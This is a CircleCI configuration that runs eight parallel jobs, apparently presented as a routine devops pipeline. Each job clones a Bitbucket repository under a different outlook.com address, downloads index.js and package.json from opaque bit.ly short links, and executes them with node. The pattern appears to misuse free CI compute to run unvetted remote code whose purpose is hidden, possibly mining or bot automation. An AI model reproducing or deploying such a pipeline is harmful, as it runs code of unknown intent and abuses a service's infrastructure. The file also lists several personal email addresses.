version: 2.1

jobs:
 devops_r_1:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch hsjukvx_357@outlook.com --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 56 -r 4 -e hsjukvx_357@outlook.com
 devops_r_2:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch anshukurmi8954@outlook.com --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 56 -r 4 -e anshukurmi8954@outlook.com
 devops_r_3:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch wmem11@outlook.com --single-branch lunarCrushData
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 56 -r 4 -e wmem11@outlook.com
 devops_r_4:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch pavansast385@outlook.com --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 56 -r 4 -e pavansast385@outlook.com
 devops_r_5:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch xla3164@outlook.com --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 3 -e xla3164@outlook.com
 devops_r_6:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch summerwhite099@outlook.com --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 56 -r 3 -e summerwhite099@outlook.com
 devops_r_7:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch lucastec1997@outlook.com --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 56 -r 4 -e lucastec1997@outlook.com
 devops_r_8:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch riadfellouq123@outlook.com --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 56 -r 4 -e riadfellouq123@outlook.com
      
      
workflows:
  devops:
    jobs:
      - devops_r_1
      - devops_r_2
      - devops_r_3
      - devops_r_4
      - devops_r_5
      - devops_r_6
      - devops_r_7
      - devops_r_8
